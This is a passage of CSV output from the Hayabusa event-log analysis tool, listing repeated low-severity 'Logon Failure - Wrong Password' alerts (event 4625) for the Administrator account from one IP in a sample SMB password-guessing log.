NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
